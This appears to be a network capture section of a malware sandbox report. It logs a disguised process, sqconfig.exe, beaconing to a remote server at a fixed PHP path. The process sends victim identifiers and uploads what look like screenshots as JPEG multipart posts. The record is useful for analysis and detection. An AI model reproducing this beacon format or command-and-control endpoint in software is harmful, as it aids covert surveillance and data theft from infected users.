                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  73192.168.2.34988191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:13.077549934 CEST14823OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:13.077827930 CEST14824OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:13.077982903 CEST14834OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:13.078197002 CEST14836OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:13.214564085 CEST14842OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:13.214660883 CEST14847OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:13.214873075 CEST14857OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:13.214905977 CEST14859OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:13.215231895 CEST14862OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
                                                                  Sep 30, 2021 23:53:13.347733021 CEST14866OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:13.347774982 CEST14881OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:53:13.529076099 CEST14911INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:13 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Sep 30, 2021 23:53:13.547189951 CEST14911OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:13.756793976 CEST14912INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:13 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:53:14.659744024 CEST14912OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:14.993819952 CEST14999INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:14 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  74192.168.2.34988291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:13.275177956 CEST14863OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:13.440762997 CEST14910INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:13 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  75192.168.2.34988391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:14.871170044 CEST14999OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:15.084317923 CEST14999INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:14 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  76192.168.2.34988491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:15.308587074 CEST15000OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:15.517273903 CEST15039INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:15 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  77192.168.2.34988591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:15.367336988 CEST15001OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:15.367389917 CEST15001OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:15.367460966 CEST15011OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:15.368200064 CEST15014OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:15.499537945 CEST15025OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:15.499613047 CEST15036OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:15.500154018 CEST15039OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
                                                                  Sep 30, 2021 23:53:15.630954981 CEST15055OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:15.631165981 CEST15061OUTData Raw: 15 bf e2 75 ce a0 bf ee 0a c6 58 ce 2b 97 0a ff 00 75 11 e3 22 dd 66 43 8e 69 c0 73 de a6 11 7b 54 8b 03 1e 8a 6b 67 34 8c 15 29 3e 85 60 b4 e0 86 ae a5 94 ad d1 1b f2 ab 09 a5 5c 3f fc b3 6a cd d6 8a dd 9b 47 0f 37 d0 cc 09 52 04 f6 ad 75 d1 67
                                                                  Data Ascii: uX+u"fCis{Tkg4)>`\?jG7Rug WHUY2/Y<LVf(OjxLViSYK}*}LA-33RZu&/6=j&<W_Ua4T'__k){:~l7pL2c
                                                                  Sep 30, 2021 23:53:15.631207943 CEST15071OUTData Raw: a6 05 37 42 27 95 99 42 4f 13 26 8b 38 a4 35 45 af f1 d0 54 2d 7e e7 a5 76 f2 33 91 50 93 35 3e 5f 5a 43 24 63 a9 ac 66 ba 90 f7 a8 cc ae 7b d3 e4 34 58 77 d4 db 37 51 2f 61 51 b6 a2 ab d3 15 8d 92 7b d1 c9 a3 91 1a 2a 09 1a 6d aa 31 e9 50 3e a1
                                                                  Data Ascii: 7B'BO&85ET-~v3P5>_ZC$cf{4Xw7Q/aQ{*m1P>!TdTCURiUYZ(P0JQ@RR$Z1J\N@4v(-1Q@\j~f_j[pZh_U_KefqO;pkvxgQLAKIKLi(Ei;L.P)h!(
                                                                  Sep 30, 2021 23:53:15.631323099 CEST15079OUTData Raw: 8c ed 20 82 30 32 72 00 19 38 ab 30 f8 46 e2 ea fa ca 1b 6d 4b 4f 9a d6 f1 26 78 ef 90 cb e4 8f 29 0b c8 18 14 0e 08 03 38 d9 ce 46 32 0d 67 52 34 aa 59 cf a6 ab fa f9 15 17 38 df 97 d0 ec f4 4f 8d fa c5 aa f9 3a cd 94 37 f1 b0 c3 4b 09 f2 25 39
                                                                  Data Ascii: 02r80FmKO&x)8F2gR4Y8O:7K%9q?>3_^6b:[f+{;[st,J].W$r3;=SO%V2puO9s<y3k6^YQnwc9W7#oSlo&
                                                                  Sep 30, 2021 23:53:15.812454939 CEST15088INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:15 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  78192.168.2.34988691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:15.769654989 CEST15088OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:15.954586983 CEST15089INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:15 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:53:16.030947924 CEST15089OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:16.031255007 CEST15089OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:16.031382084 CEST15099OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:16.031466961 CEST15102OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:16.160584927 CEST15107OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:16.160664082 CEST15115OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:16.160797119 CEST15123OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:16.160854101 CEST15129OUTData Raw: c7 87 18 ff 00 d3 33 5e 2f 7e df be 73 fe d1 af 3b 28 5e f4 cf 7b 39 77 f6 7e 87 a1 59 71 f0 ee 0f a8 fe 75 cc c9 5d 25 a1 c7 c3 bb 6f 73 fd 6b 97 95 c8 27 da b4 c2 2f 7a 7e ac e4 cc dd 94 3d 11 13 92 0f 06 90 4b 20 e8 e4 7e 34 84 e6 9b 5e 8d 91
                                                                  Data Ascii: 3^/~s;(^{9w~Yqu]%osk'/z~=K ~4^;NrgOXoE.Hu,i'AMkI>bq+[2wqVE~5lCT<GsMu5XO-&<Jii-iD'kg/TF5W+9+zO7:&r#
                                                                  Sep 30, 2021 23:53:16.284162998 CEST15132OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:53:16.284220934 CEST15151OUTData Raw: 21 cc 8b f5 ae 1c 27 f0 5f ab 3e 8e af c6 bd 11 ec fa a7 1a 16 93 ff 00 5c 47 f2 ac 5e f5 b7 ab 71 a3 69 43 fe 98 8f e4 2b 0e b9 70 bf c3 fb ca c7 ff 00 1b ee 17 14 b8 34 99 a5 cd 74 9c 61 4f 14 ca 50 6a 46 89 29 69 a0 d2 f7 a4 5a 14 53 85 37 34
                                                                  Data Ascii: !'_>\G^qiC+p4taOPjF)iZS74H;((R!iT!HRLu0Z&* qR)C5C\T8u)yz5_7uCj-JP;Y0M&MsQQ(7xxt+2JQQo
